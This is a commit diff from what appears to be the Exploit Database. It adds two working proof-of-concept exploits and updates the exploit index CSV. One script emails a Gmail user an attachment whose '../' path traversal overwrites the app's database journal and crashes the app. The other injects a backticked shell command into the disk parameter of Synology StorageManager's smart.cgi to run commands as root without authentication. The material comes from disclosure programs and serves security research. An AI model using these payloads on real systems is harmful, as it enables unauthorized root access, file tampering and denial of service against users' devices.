DB: 2017-11-29

Offensive Security · Offensive Security · commit cc349de5d365 · 2017-11-29T10:22:56.000Z
4 changes to exploits/shellcodes

Android Gmail &lt; 7.11.5.176568039 - Directory Traversal in Attachment Download

Linux Kernel 2.6.22 &lt; 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
Linux Kernel 2.6.22 &lt; 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)

YaBB 1 Gold - SP 1 YaBB.pl Cross-Site Scripting
YaBB 1 Gold SP 1 - 'YaBB.pl' Cross-Site Scripting

NetPilot/Soho Blue Router 6.1.15 - Privilege Escalation

Synology StorageManager 5.2 - Remote Root Command Execution
diff --git a/exploits/android/dos/43189.py b/exploits/android/dos/43189.py
@@ -0,0 +1,115 @@
+'''
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1342
+
+There is a directory traversal issue in attachment downloads in Gmail. For non-gmail accounts, there is no path sanitization on the attachment filename in the email, so when attachments are downloaded, a file with any name and any contents can be written to anywhere on the filesystem that the Gmail app can access. This bug has the following limitations:
+
+1) the email address has to be a non-Gmail and non Gmailified (Hotmail or Yahoo)  account
+2) the file can not overwrite an existing file, it has to be a file that doesn't already exist
+3) there user has to click to download the attachment (and the path looks a bit weird on the screen)
+
+It is possible to modify a EmailProviderBody database using this bug by placing a journal file in the databases directory.
+
+Below is a PoC of an email that causes this issue. Attached is a python script that will send an email that causes this issue (don't forget to add in the to and from addresses, and your Gmail credentials). WARNING: this PoC will cause Gmail to crash repeatedly, and you will need to re-install it to get it to work again
+
+Content-Type: multipart/mixed; boundary="---
+-714A286D976BF3E58D9D671E37CBCF7C"
+MIME-Version: 1.0
+Subject: hello
+To: <address>
+From: natashenka@google.com
+
+You will not see this in a MIME-aware mail reader.
+
+------714A286D976BF3E58D9D671E37CBCF7C
+Content-Type: text/html
+
+<html><body><b>test</b></body></html>
+
+------714A286D976BF3E58D9D671E37CBCF7C
+Content-Type: audio/wav; name="../../../../data/data/com.google.android.gm/databases/EmailProviderBody.db-journal"
+Content-Transfer-Encoding: base64
+Content-Disposition: attachment; filename="test"
+
+2dUF+SChY9f/////AAAAABAAAAAAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRyb2lkX21l
+dGFkYXRhYW5kcm9pZF9tZXRhZGF0YQNDUkVBVEUgVEFCTEUgAAAARlkAAABFSgAAAEs7AAAASSw=
+
+------714A286D976BF3E58D9D671E37CBCF7C
+'''
+
+import os
+import sys
+import smtplib
+import mimetypes
+
+from optparse import OptionParser
+
+from email import encoders
+from email.message import Message
+from email.mime.audio import MIMEAudio
+from email.mime.base import MIMEBase
+from email.mime.image import MIMEImage
+from email.mime.multipart import MIMEMultipart
+from email.mime.text import MIMEText
+import subprocess
+import random
+
+
+def main():
+
+
+
+    FROM_ADDRESS = "YOUR FROM ADDRESS HERE"
+    YOUR_CREDENTIAL = "GET A GOOGLE ACCOUNT TEMPORARY PASSWORD AND PUT IT HERE"
+    TO_ADDRESS = "ACCOUNT TO ATTACK HERE"
+
+    
+
+    composed = """Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="----714A286D976BF3E58D9D671E37CBCF7C"
+MIME-Version: 1.0
+Subject: hello image2adfdfs1
+To: """+ TO_ADDRESS +"""
+From: """ + FROM_ADDRESS + """
+
+You will not see this in a MIME-aware mail reader.
+
+------714A286D976BF3E58D9D671E37CBCF7C
+Content-Type: text/html
+
+<html><body><b>test</b></body></html>
+
+------714A286D976BF3E58D9D671E37CBCF7C
+Content-Type: audio/wav; name="../../../../data/data/com.google.android.gm/databases/EmailProviderBody.db-journal"
+Content-Transfer-Encoding: base64
+Content-Disposition: attachment; filename="%2e%2e%2fqpng"
+
+2dUF+SChY9f/////AAAAABAAAAAAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRyb2lkX21l
+dGFkYXRhYW5kcm9pZF9tZXRhZGF0YQNDUkVBVEUgVEFCTEUgAAAARlkAAABFSgAAAEs7AAAASSw=
+
+------714A286D976BF3E58D9D671E37CBCF7C"""
+
+
+
+
+    s = smtplib.SMTP_SSL("smtp.gmail.com")
+    s.login(FROM_ADDRESS, YOUR_CREDENTIAL)
+    you = TO_ADDRESS
+    s.sendmail(FROM_ADDRESS, you, composed)
+    s.quit()
+
+
+if __name__ == '__main__':
+    main()
diff --git a/exploits/cgi/webapps/43190.py b/exploits/cgi/webapps/43190.py
@@ -0,0 +1,67 @@
+'''
+SSD Advisory – Synology StorageManager smart.cgi Remote Command Execution
+
+Full report: https://blogs.securiteam.com/index.php/archives/3540
+Twitter: @SecuriTeam_SSD
+Weibo: SecuriTeam_SSD
+
+
+﻿Vulnerability Summary
+The following advisory describes a remote command execution vulnerability
+found in Synology StorageManager.
+
+Storage Manager is “a management application that helps you organize and
+monitor the storage capacity on your Synology NAS. Depending on the model
+and number of installed hard drives, Storage Manager helps you accomplish
+the following tasks:
+
+Create different types of RAID and non-RAID storage configurations, such as
+volumes, disk/RAID groups, iSCSI LUNs, and iSCSI Targets.
+Monitor the overall storage usage of your Synology NAS.
+Inspect the health of installed hard drives and solid state drives.
+Use advanced options, such as hot spare drives, SSD TRIM, SSD cache, and
+more.”
+
+Credit
+An independent security researcher, Nigusu Kassahun, has reported this
+vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
+
+Vendor response
+Synology has released patches to address this vulnerability – DSM 5.2-5967-5
+
+For more information: https://www.synology.com/en-global/releaseNote/DS210+
+
+Vulnerability details
+User controlled input is not sufficiently sanitized, and then passed to
+execve function.
+
+Successful exploitation of this vulnerability enables a remote
+unauthenticated user to run commands as root on the machine.
+
+The vulnerable parameter can be found in
+/webman/modules/StorageManager/smart.cgi with parameter
+action=apply&operation=quick&disk=%2Fdev%2Fsda
+
+Proof of Concept
+
+===
+'''
+
+# Synology StorageManager <= 5.2 Remote Root Command Execution
+
+
+import httplib
+
+
+HOST = raw_input("Enter Host: ")
+
+
+#IDOR to bypass auth and ticks to chain commands
+
+conn = httplib.HTTPConnection(HOST)
+
+conn.request("GET","/webman/modules/StorageManager/smart.cgi?action=apply&operation=quick&disk=/dev/sda`id%20>/tmp/LOL`")
+
+res = conn.geresponse()
+
+print res.status, res.reason
diff --git a/exploits/hardware/webapps/32667.pdf b/exploits/hardware/webapps/32667.pdf
diff --git a/files_exploits.csv b/files_exploits.csv
@@ -5760,6 +5760,7 @@ id,file,description,date,author,type,platform,port
 43184,exploits/multiple/dos/43184.txt,"Exim 4.89 - 'BDAT' Denial of Service",2017-11-27,meh,dos,multiple,
 43185,exploits/windows/dos/43185.pl,"KMPlayer 4.2.2.4 - Denial of Service",2017-11-22,R.Yavari,dos,windows,
 43186,exploits/windows/dos/43186.pl,"Winamp Pro 5.66.Build.3512 - Denial of Service",2017-11-22,R.Yavari,dos,windows,
+43189,exploits/android/dos/43189.py,"Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download",2017-11-28,"Google Security Research",dos,android,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9145,7 +9146,7 @@ id,file,description,date,author,type,platform,port
 40810,exploits/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,local,linux,
 40811,exploits/lin_x86-64/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,local,lin_x86-64,
 40812,exploits/linux/local/40812.c,"Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Local Privilege Escalation",2013-12-16,spender,local,linux,
-40839,exploits/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-28,FireFart,local,linux,
+40839,exploits/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-28,FireFart,local,linux,
 40847,exploits/linux/local/40847.cpp,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-27,"Gabriele Bonacini",local,linux,
 40848,exploits/windows/local/40848.java,"WinPower 4.9.0.4 - Local Privilege Escalation",2016-11-29,"Kacper Szurek",local,windows,
 40859,exploits/windows/local/40859.txt,"Microsoft Authorization Manager 6.1.7601 - 'azman' XML External Entity Injection",2016-12-04,hyp3rlinx,local,windows,
@@ -26169,7 +26170,7 @@ id,file,description,date,author,type,platform,port
 22048,exploits/php/webapps/22048.txt,"News Evolution 1.0/2.0 - Include Undefined Variable Command Execution",2002-11-26,frog,webapps,php,
 22050,exploits/cgi/webapps/22050.txt,"BizDesign ImageFolio 2.x/3.0.1 - 'imageFolio.cgi?direct' Cross-Site Scripting",2002-11-27,SecurityTracker.com,webapps,cgi,
 22051,exploits/cgi/webapps/22051.txt,"BizDesign ImageFolio 2.x/3.0.1 - 'nph-build.cgi' Cross-Site Scripting",2002-11-27,SecurityTracker.com,webapps,cgi,
-22052,exploits/cgi/webapps/22052.txt,"YaBB 1 Gold - SP 1 YaBB.pl Cross-Site Scripting",2002-11-28,"Fabricio Angeletti",webapps,cgi,
+22052,exploits/cgi/webapps/22052.txt,"YaBB 1 Gold SP 1 - 'YaBB.pl' Cross-Site Scripting",2002-11-28,"Fabricio Angeletti",webapps,cgi,
 22065,exploits/php/webapps/22065.html,"phpBB 2.0.3 - 'search.php' Cross-Site Scripting",2002-12-03,f_a_a,webapps,php,
 22070,exploits/windows/webapps/22070.py,"OTRS 3.1 - Persistent Cross-Site Scripting",2012-10-18,"Mike Eduard",webapps,windows,
 22071,exploits/php/webapps/22071.txt,"WordPress Plugin FireStorm Professional Real Estate 2.06.01 - SQL Injection",2012-10-18,"Ashiyane Digital Security Team",webapps,php,
@@ -32715,7 +32716,6 @@ id,file,description,date,author,type,platform,port
 32664,exploits/ios/webapps/32664.txt,"iShare Your Moving Library 1.0 iOS - Multiple Vulnerabilities",2014-04-02,Vulnerability-Lab,webapps,ios,8080
 32665,exploits/php/webapps/32665.txt,"Kloxo 6.1.18 Stable - Cross-Site Request Forgery",2014-04-02,"Necmettin COSKUN",webapps,php,7778
 32666,exploits/php/webapps/32666.txt,"Kloxo-MR 6.5.0 - Cross-Site Request Forgery",2014-04-02,"Necmettin COSKUN",webapps,php,7778
-32667,exploits/hardware/webapps/32667.pdf,"NetPilot/Soho Blue Router 6.1.15 - Privilege Escalation",2014-04-02,"Richard Davy",webapps,hardware,80
 32668,exploits/php/webapps/32668.txt,"CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities",2014-04-03,"Blessen Thomas",webapps,php,
 32669,exploits/php/webapps/32669.txt,"PHPcksec 0.2 - 'PHPcksec.php' Cross-Site Scripting",2008-12-17,ahmadbady,webapps,php,
 32670,exploits/php/webapps/32670.txt,"Oracle Identity Manager 11g R2 SP1 (11.1.2.1.0) - Unvalidated Redirects",2014-04-03,"Giuseppe D'Amore",webapps,php,
@@ -38227,3 +38227,4 @@ id,file,description,date,author,type,platform,port
 43158,exploits/hardware/webapps/43158.txt,"Icon Time Systems RTC-1000 Firmware 2.5.7458 - Cross-Site Scripting",2017-11-17,"Keith Thome",webapps,hardware,
 43177,exploits/multiple/webapps/43177.txt,"CommuniGatePro 6.1.16 - Cross-Site Scripting",2017-11-15,"Boumediene KADDOUR",webapps,multiple,
 43188,exploits/hardware/webapps/43188.txt,"ZTE ZXDSL 831CII - Improper Access Restrictions",2017-11-27,"Ibad Shah",webapps,hardware,
+43190,exploits/cgi/webapps/43190.py,"Synology StorageManager 5.2 - Remote Root Command Execution",2017-11-28,SecuriTeam,webapps,cgi,
